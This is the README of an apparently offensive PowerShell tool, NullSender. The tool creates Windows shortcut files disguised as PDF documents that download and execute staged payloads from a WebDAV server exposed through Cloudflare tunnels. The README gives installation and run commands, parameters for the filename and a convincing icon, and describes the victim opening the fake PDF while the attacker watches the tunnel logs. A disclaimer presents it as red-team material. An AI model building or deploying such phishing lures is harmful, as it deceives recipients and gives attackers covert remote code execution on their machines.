NullSender is a PowerShell-based tool that creates deceptive PDF shortcuts for phishing campaigns using Cloudflare tunnels. The tool generates .lnk files that appear as PDF documents but execute malicious payloads, while leveraging Cloudflare's tunneling service to establish secure, undetectable command and control channels. The attack chain involves a multi-stage payload delivery system using WebDAV servers and Windows Script Host (WSH) to bypass security controls and establish persistent access.
- Deceptive PDF Shortcuts: Creates
.lnkfiles that mimic PDF documents with custom icons and filenames - Cloudflare Tunnel Integration: Uses Cloudflare's tunneling service for secure and covert communication
- Multi-Stage Payload Delivery: Implements a staged approach using WebDAV servers and WSH scripts
- Customizable Parameters: Configurable filenames, icons, descriptions, and target paths
- WebDAV File Hosting: Serves malicious payloads through WebDAV for stealthy execution
This tool is provided for educational and research purposes only. The authors and contributors are not responsible for any misuse of this software. Users are solely responsible for ensuring compliance with applicable laws and regulations in their jurisdiction.
Important Notes:
- This tool is intended for authorized security testing and educational purposes only
- Users must obtain proper authorization before testing on any systems they do not own
- The authors do not maintain or support this repository
- Use at your own risk - no warranty is provided
- Misuse of this tool may violate computer fraud laws and other regulations
By using this tool, you acknowledge that you understand these terms and accept full responsibility for your actions.
Download and install cloudflared from the official Cloudflare website.
For the shortcut created by Create-PDF.ps1 to appear authentic, a PDF-style icon is recommended.
You can provide one via the -IconPath parameter by pointing to an icon from an application (like Adobe Reader) or using a custom .ico file.
Choose one of the following options:
Option A: IIS WebDAV Server (Default)
The tool automatically creates an IIS WebDAV server configuration when you run the setup script.
The default WebDAV server will be accessible at http://localhost:80 and can be tunneled through Cloudflare for external access.
Option B: Python WebDAV Server (Quick Setup)
The python http server module can be used as a testing/development server, but might not be best-suited for a production environment.
Option C: Apache WebDAV Server
An Ansible playbook is available in the playbooks/ directory to automate the setup of an Apache WebDAV server with proper security configurations.
To use the Ansible playbook:
- Navigate to the
playbooks/directory - Review and modify the
hostsfile with your target server details - Run the playbook:
ansible-playbook -i hosts apache-webdav.yml
-
Clone the Repository
git clone https://github.com/ghosteye-ai/NullSender/ cd NullSender -
Run the Main Script
.\Generate-Phish.ps1By default the script will create two-stages: stage1.wsf and stage2.bat. These stages can be easily modified for any engagement specific requirements. The script will also install and setup an IIS WebDAV server and start a cloudflare tunnel assuming cloudflard is installed. If you only wish to execute parts of the payload creation you can find them individually in /scripts.
-
Script Parameters (Optional)
-TargetPath: Directory where the.lnkfile will be created-FileName: Name of the file (will be appended with.lnk)-WebDAVUrl: URL of your WebDAV server (can be tunneled through Cloudflare)-IconPath: (Optional) Path to a custom PDF icon-Description: (Optional) Custom description for the shortcut
- The created
.lnkfile will appear as a PDF document to the victim - When executed, it will download and execute the payload from your WebDAV server
- Monitor the tunnel logs for successful connections and payload executions
Example Usage:
If you’re a security leader, or a professional looking for a platform that focuses on reducing human-generated risk — we’re the people for you. Join our waitlist at https://ghosteye.ai